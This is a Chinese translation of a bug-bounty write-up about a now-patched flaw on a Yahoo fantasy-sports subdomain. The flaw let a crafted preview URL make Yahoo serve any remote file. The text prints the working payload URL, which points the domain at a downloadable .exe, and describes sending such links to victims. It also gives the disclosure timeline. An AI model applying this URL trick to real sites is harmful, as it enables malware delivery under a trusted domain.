大家好！很感谢大家能够抽出宝贵的时间来阅读这篇文章。

　　本文简介

在此之前，我曾发现了一个非常奇怪的漏洞，这个漏洞也成功引起了我的注意。今天，我将会在这篇文章中跟大家分享一些关于这个漏洞的信息。目前，这个漏洞还没有名字，而且也没有新闻对其进行过报道。也许大家只是觉得这个漏洞无关紧要吧！

我之所以要发表这篇文章，就是为了告诉大家，有的时候你只需要稍微改变一下自己思考方式，换一个角度来看待某些东西，你就会发现其中存在的问题。

漏洞的概念验证实例：

一开始的时候，我只是想要找到一个RFD漏洞。虽然我没有找到，但是我却发现了另一个非常关键的安全漏洞。

当时，我正在对雅虎公司的一个专门提供赛车比赛的子域名网站(fantasysports)进行分析。在这个网站中，技术人员加入了一种能够提前预览部分比赛视频的功能。当我对这个功能进行安全分析时我才发现，当终端用户正在预览比赛视频或者信息时，用户的计算机中将会出现一个.pdf文件。而这个文件也引起了我的注意。

于是，我开始对这个文件进行分析和研究。在我进行分析的过程中，我的脑海里突然萌生了一个我认为非常有趣的想法，我是不是能够在雅虎域名中调用或下载远程文件呢？

那么问题来了：我该怎么做呢？

 

答案很简单。

Preview_1.pdf文件的URL地址如下：

http：//racing.fantasysports.yahoo.com/auto/fanballguidepdf/Preview_1.pdf？file=preview&race=1

现在，我就可以利用远程文件的URL地址来调用或下载雅虎域名中的文件了。那么关键的地方来了，这也就意味着，我可以直接将雅虎域名中的Preview_1.pdf文件替换成其他的恶意文件了。

比如说，我可以利用http：//www.7-zip.org/a/7z1506.exe中的恶意文件替换Preview_1.pdf。因此，我就可以直接利用7.zip来对这个.exe恶意文件进行压缩，并上传了。(但是请注意，根据雅虎公司的网络安全策略，你应该尽量降低这种恶意操作给终端用户所带来的影响)

所以，我最终的恶意Payload如下：

http：//racing.fantasysports.yahoo.com/auto/fanballguidepdf/http：//www.7-zip.org/a/7z1506.exe？file=preview&race=5

当我按下回车键时，奇迹就这样发生了！

 

现在，我就可以从雅虎域名中下载或调用其他域名中的远程文件了。

问题的关键到底在哪？

由于雅虎网站的文件调用机制，雅虎会在其子域名中利用类似“URL+任意文件”的形式来远程调用服务器中的文件，这也就使得这个问题变得更加的严重了。攻击者可以将这个URL地址发送给目标用户，如果用户点击了这个URL地址，那么用户的计算机将会受到攻击。

这个问题如何修复呢？

1) 禁用“预览”功能。

2) 存在设计缺陷的URL地址将会产生如下图所示的错误提示。

 

概念验证视频：

视频地址：https：//youtu.be/BAWMgDnwgdI

在我将这个漏洞报告给雅虎公司的安全团队之后，该团队的安全研究人员告诉我这就是一个RFD漏洞。于是我便向他们发送了一封电子邮件，并在邮件中跟他们解释了RFD漏洞与我所发现的这个漏洞之间的区别在哪里。

在此，我要感谢@dsopas，他很清楚我所要表达的意思。

他们给我的回复信息如下图所示：

 

他们解释称，这个漏洞实际上是一个Open Redirect漏洞。于是，我又写了一封电子邮件来向他们解释Open Redirect漏洞与我所发现的这个漏洞之间的区别是什么。

最后，他们同意了我的观点，他们也承认了这个漏洞既不是RFD漏洞，也不是Open Redirect漏洞，而是一种新型的攻击漏洞。

 

随后，雅虎公司的安全团队也给我提供了一定的奖励。

 

事件时间轴：

2015年08月31日：我将这个漏洞提交给了雅虎公司的安全团队。

2015年09月01日：首次收到了雅虎安全团队的漏洞反馈信息。

2016年02月02日：雅虎安全团队修复了这个漏洞，并让我等待关于漏洞奖励的通知。

2016年02月22日：雅虎安全团队告诉我这是一个RFD漏洞。

2016年02月22日：我向他们解释了RFD漏洞与我所发现的漏洞之间的区别。

2016年03月08日：雅虎安全团队证实这个漏洞并非RFD漏洞，并回复我这是一个Open Redirect漏洞。

2016年03月08日：我向他们解释了Open Redirect漏洞与我所发现的漏洞之间的区别。

2016年03月11日：雅虎安全公司发布了漏洞公告。

2016年03月27日：对漏洞信息进行了公布

原文链接：http：//shield4you.blogspot.sg/2016/03/how-i-able-to-download-any-malicious.html

(责任编辑：安博涛)